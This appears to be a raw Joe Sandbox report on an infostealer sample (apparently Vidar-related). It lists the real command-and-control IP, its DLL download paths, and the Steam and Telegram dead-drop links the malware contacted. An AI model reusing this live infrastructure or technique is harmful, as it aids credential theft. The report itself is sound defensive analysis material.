                            https://mozilla.org0/0%URL Reputationsafe
                            http://ocsp.sectigo.com00%URL Reputationsafe
                            http://tempuri.org/RawEvent.xsd$StaffCategoriesSetRhttp://tempuri.org/StaffCategoriesSet.xsd1%VirustotalBrowse
                            https://65.109.242.73/4%VirustotalBrowse
                            http://tempuri.org/TimesheetSummarySet.xsd1%VirustotalBrowse
                            https://65.109.242.73/24%VirustotalBrowse
                            http://tempuri.org/IoBoardInputsSet.xsd1%VirustotalBrowse
                            http://tempuri.org/TimesheetEventLogsSet.xsd1%VirustotalBrowse
                            http://tempuri.org/TimesheetCategoriesSet.xsd1%VirustotalBrowse
                            https://65.109.242.73/sqln.dll4%VirustotalBrowse
                            http://tempuri.org/UsersSet.xsd1%VirustotalBrowse
                            https://urn.to/r/sds_see0%VirustotalBrowse
                            http://tempuri.org/TimesheetDetailsSet.xsd1%VirustotalBrowse
                            https://urn.to/r/sds_see=isolation0%VirustotalBrowse
                            http://tempuri.org/EventsSet.xsd1%VirustotalBrowse
                            http://tempuri.org/IoBoardOutputsSet.xsd1%VirustotalBrowse
                            http://tempuri.org/DepartmentsSet.xsd1%VirustotalBrowse
                            http://tempuri.org/TimezonesSet.xsd1%VirustotalBrowse
                            http://tempuri.org/CardsSet.xsd1%VirustotalBrowse
                            http://tempuri.org/CardTemplateSet.xsd1%VirustotalBrowse

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            steamcommunity.com
                            		23.4.32.216
                            		truefalse
                              		high
                              fp2e7a.wpc.phicdn.net
                              		192.229.211.108
                              		truefalseunknown
                              windowsupdatebg.s.llnwi.net
                              		69.164.42.0
                              		truefalseunknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://65.109.242.73/mozglue.dllfalse
                                		unknown
                                https://65.109.242.73/falseunknown
                                https://65.109.242.73/sqln.dllfalseunknown
                                https://65.109.242.73/freebl3.dllfalse
                                  		unknown
                                  https://65.109.242.73/msvcp140.dllfalse
                                    		unknown
                                    https://65.109.242.73/vcruntime140.dllfalse
                                      		unknown
                                      https://65.109.242.73/nss3.dllfalse
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabFBFCGIDA.1.drfalse
                                          		high
                                          http://ACVC.WPF.Service.Wcf/IOvpnProcessRunner/StopResponseRYyIDUCFWC1.exefalse
                                            		unknown
                                            https://duckduckgo.com/ac/?q=FBFCGIDA.1.drfalse
                                              		high
                                              https://65.109.242.73/BMSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://65.109.242.73/nss3.dllEMSBuild.exe, 00000001.00000002.2097165559.0000000001093000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://steamcommunity.com/login/home/?goto=profiles%2F7656119967301988876561199673019888[1].htm.1.drfalse
                                                    		high
                                                    https://steamcommunity.com/?subsection=broadcastsMSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                      		high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e1730.exeMSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://65.109.242.73TMSBuild.exe, 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		low
                                                          https://65.109.242.73/XMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                              		high
                                                              http://tempuri.org/IoBoardInputsSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                		high
                                                                https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&amp;l=englMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                  		high
                                                                  http://www.valvesoftware.com/legal.htmMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                    		high
                                                                    https://65.109.242.73/09.242.73/LocalMSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                        		high
                                                                        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                          		high
                                                                          https://65.109.242.73/vcruntime140.dllcMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                              		high
                                                                              http://tempuri.org/RawEvent.xsd$StaffCategoriesSetRhttp://tempuri.org/StaffCategoriesSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                              https://65.109.242.73/$MSBuild.exe, 00000001.00000002.2097165559.000000000107E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=englishMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                  		high
                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                    		high
                                                                                    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=englishMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                      		high
                                                                                      https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=enMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                        		high
                                                                                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLMSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                          		high
                                                                                          https://65.109.242.73/2MSBuild.exe, 00000001.00000002.2097165559.000000000107E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&amMSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                            		high
                                                                                            http://tempuri.org/TimesheetSummarySet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                            https://65.109.242.73/amDataMSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://ACVC.WPF.Service.WcfTYyIDUCFWC1.exefalse
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMMMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                  		high
                                                                                                  https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jU8h8CqVh6FY&amp;l=eMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                    		high
                                                                                                    http://www.mozilla.com/en-US/blocklist/MSBuild.exe, MSBuild.exe, 00000001.00000002.2111715611.000000006CF6D000.00000002.00000001.01000000.0000000B.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.drfalse
                                                                                                      		high
                                                                                                      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                        		high
                                                                                                        https://mozilla.org0/nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://steamcommunity.com/sMSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&amp;MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                            		high
                                                                                                            http://tempuri.org/TimesheetEventLogsSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                                            http://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                              		high
                                                                                                              https://65.109.242.73/esMSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://store.steampowered.com/points/shop/MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                  		high
                                                                                                                  http://tempuri.org/TimesheetCategoriesSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=FBFCGIDA.1.drfalse
                                                                                                                    		high
                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17.exeMSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmp, GCBGIIEC.1.drfalse
                                                                                                                        		high
                                                                                                                        https://steamcommunity.com/profiles/76561199673019888/badgesMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                          		high
                                                                                                                          https://www.ecosia.org/newtab/FBFCGIDA.1.drfalse
                                                                                                                            		high
                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brKEHCAFHIJECGCAKFCGDBKEGIDH.1.drfalse
                                                                                                                              		high
                                                                                                                              https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199673019888[1].htm.1.drfalse
                                                                                                                                		high
                                                                                                                                https://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                  		high
                                                                                                                                  http://tempuri.org/UsersSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                    		high
                                                                                                                                    http://127.0.0.1:YyIDUCFWC1.exefalse
                                                                                                                                      		unknown
                                                                                                                                      http://tempuri.org/EventsSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                                                                      http://tempuri.org/CardTemplateSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                                                                      http://tempuri.org/IoBoardOutputsSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                                                                      https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                        		high
                                                                                                                                        https://65.109.242.73BKJDMSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                          		low
                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                            		high
                                                                                                                                            https://urn.to/r/sds_seeYyIDUCFWC1.exefalseunknown
                                                                                                                                            https://urn.to/r/sds_see=isolationYyIDUCFWC1.exefalseunknown
                                                                                                                                            http://tempuri.org/TimesheetDetailsSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                                                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                              		high
                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesGCBGIIEC.1.drfalse
                                                                                                                                                		high
                                                                                                                                                https://65.109.242.73/softokn3.dllXMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://store.steampowered.com/about/76561199673019888[1].htm.1.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://steamcommunity.com/my/wishlist/MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://t.me/irfailAtYyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1709833273.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://tempuri.org/DepartmentsSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                                                                                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFKEHCAFHIJECGCAKFCGDBKEGIDH.1.drfalse
                                                                                                                                                              		high
                                                                                                                                                              http://tempuri.org/TimezonesSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                                                                                              http://ocsp.sectigo.com0YyIDUCFWC1.exefalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://help.steampowered.com/en/MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://steamcommunity.com/market/MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://store.steampowered.com/news/MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://tempuri.org/CardsSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                                                                                                    https://system.data.sqlite.org/XYyIDUCFWC1.exefalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=FBFCGIDA.1.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmp, GCBGIIEC.1.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://ACVC.WPF.Service.Wcf/IOvpnProcessRunner/StartResponseYyIDUCFWC1.exefalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://65.109.242.73/XRMSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enMSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://steamcommunity.com/discussions/MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://store.steampowered.com/stats/MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://tempuri.org/OperatorSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://tempuri.org/CameraAuthenticationsSet.xsdYyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drfalse
                                                                                                                                                                                              		high

                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                              Public IPs

                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                              65.109.242.73
                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                              		11022ALABANZA-BALTUSfalse
                                                                                                                                                                                              23.4.32.216
                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                              		16625AKAMAI-ASUSfalse

                                                                                                                                                                                              General Information

                                                                                                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                              Analysis ID:1427891
                                                                                                                                                                                              Start date and time:2024-04-18 10:09:22 +02:00
                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                              Overall analysis duration:0h 7m 57s
                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                              Report type:full
                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                              Number of analysed new started processes analysed:5
                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                              Technologies:
                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                              Sample name:YyIDUCFWC1.exe
                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                              Original Sample Name:6d59b75f2b8bf7590c144cd4b3d24516.exe
                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@3/27@1/2
                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                              • Successful, ratio: 95%
                                                                                                                                                                                              • Number of executed functions: 125
                                                                                                                                                                                              • Number of non-executed functions: 210
                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                              • Stop behavior analysis, all processes terminated

                                                                                                                                                                                              Warnings

                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 52.165.165.26, 69.164.42.0, 13.85.23.206, 192.229.211.108
                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                              Simulations

                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                              10:10:15API Interceptor1x Sleep call for process: YyIDUCFWC1.exe modified
                                                                                                                                                                                              10:10:21API Interceptor1x Sleep call for process: MSBuild.exe modified

                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                              IPs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              65.109.242.73SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    23.4.32.216https://steamproxy.vip/?subsection=reviewsGet hashmaliciousUnknownBrowse
